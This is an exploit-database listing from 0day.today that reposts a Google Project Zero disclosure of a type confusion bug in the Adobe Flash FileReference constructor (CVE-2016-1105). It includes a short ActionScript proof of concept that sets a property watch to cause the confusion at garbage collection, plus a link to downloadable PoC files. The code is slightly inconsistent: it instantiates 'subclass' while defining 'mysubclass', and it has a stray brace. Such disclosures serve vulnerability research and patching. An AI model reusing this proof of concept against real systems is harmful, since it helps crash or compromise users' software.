[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Adobe Flash - Type Confusion in FileReference Constructor

Author
Google Security Research
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-26016
Category
dos / poc
Date add
17-05-2016
CVE
CVE-2016-1105
Platform
windows
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=799
 
There is a type confusion issue in the FileReference constructor. The constructor adds several properties to the constructed object before setting the type and data. If a watch is set on one of these properties, code can be called and the object can be initialized to one with a destructor before the FileReference constructor sets the object data, leading to type confusion when the object is garbage collected.
 
A minimal PoC is as follows:
 
function myfunc(){
             
            this.__proto__ = {};
            this.__proto__.__constructor__ = flash.display.BitmapData;
            super(1000, 1000);
             
             
            }
             
 
    function mysubclass(){
         
 
        this.watch("name", myfunc);
        _global.ASnative(2204, 200)(this); // FileReference constructor
        this.unwatch("name"); // let the reference free
         
        }
    }
 
        var a = new subclass();
        a = 0;
        // wait for GC
 
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39829.zip

#  0day.today [2024-12-24]  #